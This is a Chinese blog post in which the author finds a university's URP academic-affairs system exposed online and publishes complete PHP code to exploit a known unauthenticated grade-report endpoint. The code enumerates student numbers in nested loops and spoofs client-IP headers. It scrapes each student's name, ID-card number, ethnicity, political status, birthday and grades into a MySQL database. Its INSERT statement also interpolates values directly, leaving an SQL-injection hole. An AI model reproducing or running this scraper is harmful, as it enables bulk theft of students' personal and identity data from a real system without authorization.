前述:
刚到一个新学校,看到群里说要去222.132.XX.XXX:80833(此处应该是写通知的老师错误,反正我是没找到80833端口),通过尔雅选选修课,出于习惯,检查了下这个IP,发现8080端口还跑着URP综合教务系统。。
前期探索:
去wooyun.org查了下相关内容,发现好多关于URP的洞,如图:
查询到cj_zwcjd.jsp这个文件,便利用了一下,正好练习一下PHP脚本。
查询流程:
用户访问cj_zwcjd.jsp页面->输入学号->点击查询->存在一个302跳转->获取反馈结果页面
程序环境:
- PHP 5.5.9 (附加:swoole 以及 Simple HTML DOM)
- MySQL 5.5.44 (主要为了记录接下来获取的信息)
部分相关介绍:
- swoole用起来感觉还不错,从之前的代码中直接copy使用了,附上一个相关的参考链接:http://rango.swoole.com/archives/265
- 为了解析接下来获取到的HTML代码,使用了Simple HTML DOM这个插件,同样附上一个参考链接:http://www.phpddt.com/manual/simplehtmldom_1_5/manual.htm
实现功能:
软件根据预设形成一个学号,并通过此学号查询此人的成绩单,查到会自动将返回的html解析,最后插入MySQL数据库中,可以获取的信息有:姓名、性别、照片(由于我这个学校的URP里没照片,没做进一步提取)、籍贯、身份证号、班级、专业、政治面貌、民族、系、学院、课程及相应成绩
软件目录结构:
注:./class/plug/simplehtmldom_1_5 这个目录下是Simple HTML DOM扩展哈
PHP文件代码
- ./config/config.inc.php (一些配置信息)
<?php
/**
 * Created by PhpStorm.
 * User: henry
 * Date: 15-10-18
 * Time: 8:58 PM
 *
 * Connection settings; do_cli.php reads all three constants.
 */

// Host part of the request address (no scheme); do_cli.php joins it with REQUEST_PORT.
define('REQUEST_URL','222.132.XX.XXX');
// Port, stored as a string because it is concatenated into the address.
define('REQUEST_PORT','8080');
// Interval between requests, in seconds (do_cli.php passes it to sleep()).
define('REQUEST_SPEED',5);
- ./class/htmlFilter.class.php (HTML解析相关)
<?php
/**
 * Created by PhpStorm.
 * User: henry
 * Date: 15-10-19
 * Time: 4:57 PM
 */

/**
 * Parses one result page with Simple HTML DOM, reads a fixed set of table
 * cells into a student record plus a list of course rows, and sends an INSERT
 * statement for them through $this->sqlLive.
 *
 * NOTE(review): the parent class sMySQL is not visible here; what
 * parent::__construct() returns and what send()/recv() do are assumptions to
 * confirm against that class.
 * NOTE(review): the fields handled here are personal data (name, ID-card
 * number, grades); confirm that collecting and storing them is authorized.
 */
class htmlFilter extends sMySQL {
    private $htmlObj; // simple_html_dom object holding the parsed page

    /*
     * Constructor.
     *
     * $html: HTML source as a string.
     */
    public function __construct($html){
        $this->htmlObj = new simple_html_dom();
        $this->htmlObj->load($html); // load from an HTML string
        //$this->htmlObj->load_file($html); // load from a file
        // Keeps whatever the parent constructor call evaluates to; the methods
        // below call send() and recv() on it.
        $this->sqlLive = parent::__construct();
    }

    /*
     * Photo extraction: echoes the outer HTML of every <img> element.
     * Not called at the moment (the call in htmlAnalysis() is commented out)
     * because no test environment was available.
     */
    private function getPhoto(){
        $photoArr = $this->htmlObj->find('img');
        foreach ($photoArr as $a ){
            echo $a->outertext;
        }
    }

    /*
     * Builds the INSERT statement for table `studentInfo` and sends it.
     *
     * $studentBasicInfoArr: associative array with the keys interpolated below.
     * $courseInfoJSON:      JSON string stored in the `courseInfo` column.
     *
     * Returns true when the unserialized reply is truthy, false otherwise.
     * Values are interpolated into the statement text as-is.
     */
    private function recordStudentInfoSQL($studentBasicInfoArr,$courseInfoJSON){
        // Build the SQL text
        $sql = "INSERT INTO `studentInfo`(`id_card`,`real_name`,`student_id`,`sex`,`nation`,`native_place`,`political_status`, `birthday`,`class_name`,`entrance_time`,`graduation_date`,`major`,`major_direction`,`department`,`cultivation_plan`,`courseInfo`) VALUES( '{$studentBasicInfoArr['idCard']}','{$studentBasicInfoArr['realName']}','{$studentBasicInfoArr['studentID']}','{$studentBasicInfoArr['sex']}', '{$studentBasicInfoArr['nation']}','{$studentBasicInfoArr['nativePlace']}','{$studentBasicInfoArr['politicalStatus']}','{$studentBasicInfoArr['birthday']}', '{$studentBasicInfoArr['className']}','{$studentBasicInfoArr['entranceTime']}','{$studentBasicInfoArr['graduationDate']}','{$studentBasicInfoArr['major']}', '{$studentBasicInfoArr['majorDirection']}','{$studentBasicInfoArr['department']}','{$studentBasicInfoArr['cultivationPlan']}','$courseInfoJSON')";
        $this->sqlLive->send($sql);
        // The reply is expected in PHP serialize() format.
        $res = unserialize($this->sqlLive->recv());
        if ($res){
            return true;
        } else {
            return false;
        }
    }

    /*
     * Parses the page and records everything found.
     *
     * All values come from <td class="report1_2_1"> cells, addressed by fixed
     * position, and are converted from GBK to UTF-8.
     * Returns the result of recordStudentInfoSQL() as a boolean.
     */
    private function getAndRecordStudentInfo(){
        $trInfoArr = $this->htmlObj->find('td[class="report1_2_1"]');
        $studentBasicInfoArr = array(
            'realName' => iconv('GBK', 'UTF-8',$trInfoArr[1]->innertext), // name
            'studentID' => iconv('GBK', 'UTF-8',$trInfoArr[3]->innertext), // student number
            'sex' => iconv('GBK', 'UTF-8',$trInfoArr[4]->innertext), // sex
            'idCard' => iconv('GBK', 'UTF-8',$trInfoArr[6]->innertext), // ID-card number
            'nation' => iconv('GBK', 'UTF-8',$trInfoArr[9]->innertext), // ethnic group
            'nativePlace' => iconv('GBK', 'UTF-8',$trInfoArr[11]->innertext), // native place
            'politicalStatus' => iconv('GBK', 'UTF-8',$trInfoArr[13]->innertext), // political status
            'birthday' => iconv('GBK', 'UTF-8',$trInfoArr[15]->innertext), // date of birth
            'className' => iconv('GBK', 'UTF-8',$trInfoArr[17]->innertext), // class
            'entranceTime' => iconv('GBK', 'UTF-8',$trInfoArr[19]->innertext), // enrolment date
            'graduationDate' => iconv('GBK', 'UTF-8',$trInfoArr[21]->innertext), // graduation date
            'major' => iconv('GBK', 'UTF-8',$trInfoArr[23]->innertext), // major
            'majorDirection' => iconv('GBK', 'UTF-8',$trInfoArr[25]->innertext), // major direction
            'department' => iconv('GBK', 'UTF-8',$trInfoArr[27]->innertext), // department
            'cultivationPlan' => iconv('GBK', 'UTF-8',$trInfoArr[29]->innertext) // training plan
        );
        // Course rows: five consecutive cells per course starting at index 40;
        // the loop bound leaves the last nine matching cells out.
        for ($i=40;$i<count($trInfoArr)-9;$i+=5){
            $courseInfoArr[] = array(
                'courseName' => iconv('GBK', 'UTF-8',$trInfoArr[$i]->innertext), // course name
                'score' => iconv('GBK', 'UTF-8',$trInfoArr[$i+1]->innertext), // score
                'studyMode' => iconv('GBK', 'UTF-8',$trInfoArr[$i+2]->innertext), // study mode
                'courseType' => iconv('GBK', 'UTF-8',$trInfoArr[$i+3]->innertext), // course type
                'examDate' => iconv('GBK', 'UTF-8',$trInfoArr[$i+4]->innertext) // exam date
            );
        }
        // JSON-encode the course list (non-ASCII characters kept unescaped)
        //echo strlen(json_encode($courseInfoArr,JSON_UNESCAPED_UNICODE));
        if ($this->recordStudentInfoSQL($studentBasicInfoArr,json_encode($courseInfoArr,JSON_UNESCAPED_UNICODE)) == true){
            return true;
        } else {
            return false;
        }
    }

    /*
     * Public entry point: analyses the loaded result page.
     * Returns true when the record was stored, false otherwise.
     */
    public function htmlAnalysis(){
        // Photo extraction (disabled)
        //$this->getPhoto();
        // Extract and record all student information
        if ($this->getAndRecordStudentInfo() == true){
            return true;
        } else {
            return false;
        }
    }

    /*
     * Destructor: releases the Simple HTML DOM object.
     */
    public function __destruct(){
        $this->htmlObj->clear();
    }
}
- ./class/request.class.php (主要为了做POST与GET请求)
<?php
/**
 * Created by PhpStorm.
 * User: henry
 * Date: 15-10-18
 * Time: 9:02 PM
 */

/**
 * Small cURL wrapper offering one POST and one GET helper.
 *
 * The header list lives in a static property, so it is shared by every
 * instance of the class.
 */
class request {
    static private $header; // HTTP header lines (shared across instances)
    private $url; // URL used by httpPostParams()

    // Stores the URL used by httpPostParams().
    private function setURL($url){
        $this->url = $url;
    }

    // Returns the URL given to the constructor.
    public function getURL(){
        return $this->url;
    }

    /*
     * Constructor.
     *
     * $url:      address used by httpPostParams().
     * $sourceIP: value placed in the CLIENT-IP header line; when empty, one is
     *            generated by createIP().
     */
    public function __construct($url,$sourceIP = ''){
        // No source IP supplied
        if (empty($sourceIP)){
            $sourceIP = $this->createIP();
        }
        // Build the header lines
        self::$header = array(
            'CLIENT-IP:'.$sourceIP,
            'X-FORWARDED-FOR:8.8.8.8'
        );
        // Store the URL
        $this->setURL($url);
    }

    /*
     * Optionally replaces the header list.
     *
     * $headerArr: array of header lines. Any other type prints a message and
     *             terminates the script.
     */
    public function setHeader($headerArr){
        // The header list must be an array
        if (!is_array($headerArr)){
            echo '如果需要设置$header请传入一个数组';
            exit;
        }
        // Replace the header list
        self::$header = $headerArr;
    }

    /*
     * Generates a dotted-quad string: the first part is picked from a fixed
     * list, the other three are random values rounded from the range 60..255.
     */
    private function createIP(){
        $ip_1_arr = array('214','123','54','53','222','215','10','16');
        $ip_2 = round(rand(600000,2550000)/10000);
        $ip_3 = round(rand(600000,2550000)/10000);
        $ip_4 = round(rand(600000,2550000)/10000);
        $randArr = mt_rand(0,count($ip_1_arr)-1);
        $ip_1 = $ip_1_arr[$randArr];
        return $ip_1.'.'.$ip_2.'.'.$ip_3.'.'.$ip_4;
    }

    /*
     * Sends a POST request to the stored URL with cURL.
     *
     * $postDataArr: associative array of field => value. Any other type prints
     *               a message and terminates the script.
     *
     * Returns the cURL output when the HTTP status is 302, false for every
     * other status.
     */
    public function httpPostParams($postDataArr){
        if (!is_array($postDataArr)){
            echo 'post提交的数据请以数组的形式传入';
            exit;
        }
        // Join the fields as key=value& pairs; keys and values are used as
        // given (no encoding applied here), and a trailing '&' remains.
        $postData = '';
        foreach($postDataArr as $key => $val){
            $postData .= $key .'=' .$val.'&';
        }
        $curl = curl_init();
        // The header array is passed as the value of CURLOPT_HEADER.
        curl_setopt($curl,CURLOPT_HEADER,self::$header);
        curl_setopt($curl,CURLOPT_URL,$this->url);
        curl_setopt ($curl,CURLOPT_POSTFIELDS, $postData);
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:41.0) Gecko/20100101 Firefox/41.0');
        $result = curl_exec($curl);
        $httpCode = curl_getinfo($curl,CURLINFO_HTTP_CODE);
        curl_close($curl);
        switch ($httpCode){
            case '302':{
                return $result;
            }
            break;
            default:{
                return false;
            }
        }
    }

    /*
     * Sends a GET request with cURL.
     *
     * $url: address to fetch (the URL stored in the object is not used here).
     *
     * Returns the response body when the HTTP status is 200, false for every
     * other status.
     */
    public function httpGetParams($url = ''){
        $curl = curl_init($url);
        curl_setopt($curl,CURLOPT_RETURNTRANSFER,true);
        // NOTE(review): the string literal below spans a line break exactly as
        // it appears in this source; httpPostParams() has the same text on a
        // single line, so the break is presumably a wrapping artifact — confirm.
        curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:41.0) 
Gecko/20100101 Firefox/41.0');
        $result = curl_exec($curl);
        $httpCode = curl_getinfo($curl,CURLINFO_HTTP_CODE);
        curl_close($curl);
        //echo $url;
        switch ($httpCode){
            case '200':{
                return $result;
            }
            break;
            default:{
                return false;
            }
        }
    }
}
- ./class/stringFilter.class.php (字符串过滤,主要为了获取a标签中的href值)
<?php
/**
 * Created by PhpStorm.
 * User: henry
 * Date: 15-10-19
 * Time: 4:40 PM
 */

/**
 * String helpers for picking values out of raw HTML text.
 */
class stringFilter {
    /*
     * Constructor (nothing to initialise).
     */
    public function __construct(){
    }

    /*
     * Extracts an attribute value from the text of a redirect response.
     *
     * Takes the text from the first occurrence of =" up to (not including)
     * the next ">, then removes every =" from that piece. do_cli.php passes
     * the result to httpGetParams() as the URL to fetch.
     *
     * $html: raw response text.
     */
    public function getTagA_Href($html){
        return str_replace('="','',strstr(strstr($html,'="',false),'">',true));
        //strstr(strstr($html,'="',false),'">',true);
        //strstr($html,'<a ',false);
    }

    /*
     * Intended to extract the PDF download link from the result page.
     * Not implemented: the body is empty.
     */
    public function getStudentInfoPdfDownload($html){
    }
}
- ./class/studentID.class.php (这个想了想,还需要改很多,就先临时简单处理了一下)
<?php
/**
 * Created by PhpStorm.
 * User: henry
 * Date: 15-10-20
 * Time: 8:45 PM
 */

/**
 * Builds student-number strings by concatenating grade, department number and
 * student number.
 *
 * The grade is held in a static property, so it is shared by all instances.
 */
class studentID {
    private static $grade; // grade (year prefix of the student number)

    /*
     * Constructor.
     *
     * $grade: grade value placed at the front of every generated number.
     */
    public function __construct($grade){
        self::$grade = $grade;
    }

    /*
     * Creates one student number.
     *
     * $departmentNum: department part (default 1000).
     * $studentNum:    per-student part (default 1000).
     *
     * Returns the three parts joined into one string, without separators.
     */
    public function createStudentID($departmentNum = 1000,$studentNum = 1000){
        return self::$grade.$departmentNum.$studentNum;
    }
}
- ./do_cli.php (CLI模式下执行主程序)
<?php
/**
 * Created by PhpStorm.
 * User: henry
 * Date: 15-10-18
 * Time: 8:58 PM
 *
 * CLI entry point: for every generated student number, POST it to the report
 * endpoint, follow the link found in the 302 response with a GET, then parse
 * and record the returned page.
 *
 * NOTE(review): this loop walks through other people's student numbers and
 * stores their personal data; it must not be run against a system without
 * explicit authorization from its owner.
 */
require_once 'config/config.inc.php';
require_once 'class/request.class.php';
require_once 'class/sMySQL.class.php';
require_once 'class/htmlFilter.class.php';
require_once 'class/stringFilter.class.php';
require_once 'class/plug/simplehtmldom_1_5/simple_html_dom.php';
require_once 'class/studentID.class.php';

// Build the request address from the configured host and port
$url = REQUEST_URL.':'.REQUEST_PORT.'/setReportParams';
$req = new request($url);
$stuID = new studentID(2012);
$getA_Href = new stringFilter();

// Loop over department numbers
for ($d=1270;$d<8000;$d++){
    // Loop over student numbers
    for ($s=1001;$s<8000;$s++){
        // Build the POST fields; resultPage is already URL-encoded
        $postData = array(
            'LS_XH' => $stuID->createStudentID($d,$s),
            'resultPage'=> 'http%3A%2F%2F222.132.XX.XXX%3A8080%2FreportFiles%2Fcj%2Fcj_zwcjd.jsp'
        );
        // Send the POST request
        $result = $req->httpPostParams($postData);
        // httpPostParams() returns non-false only for HTTP 302
        if ($result != false){
            // Take the href value from the response and GET that address
            $html = $req->httpGetParams($getA_Href->getTagA_Href($result));
            // The page was fetched successfully
            if ($html != false){
                $record = new htmlFilter($html);
                // Record the data
                if ($record->htmlAnalysis() == true){
                    echo 'success!';
                } else {
                    echo 'record fail!';
                }
                // Explicit destructor call to release the parsed DOM
                $record->__destruct();
            } else {
                echo 'get html page fail!';
            }
        }
        // Wait REQUEST_SPEED seconds before the next request
        sleep(REQUEST_SPEED);
    }
}
执行:
Linux下,进入do_cli.php的目录下,直接执行:#php do_cli.php
注意问题:
- 由于用到swoole扩展,需要通过命令#php -m检查是否包含此模块。
- 记得先启用swoole监听程序,否则会记录失败。
- 要注意通过curl请求的时候,加入一个userAgent,否则系统返回500错误 – –
执行结果截图:
注:本来想直接获取PDF/Text/Excel文件得了,后来想了想,不如存在数据库里面方便,就把成绩单的课程相关内容,转成了JSON格式存储在数据库中。
后续:
这是第一个版本,还有很多地方没处理,如:多线程、学号相关逻辑、错误输出不够人性化等等,仅供学习与记录吧。
66666
赞~
Hi i am kavin, its my first occasion to commenting anywhere,
when i read this piece of writing i thought i could also make comment due to this good piece of
writing.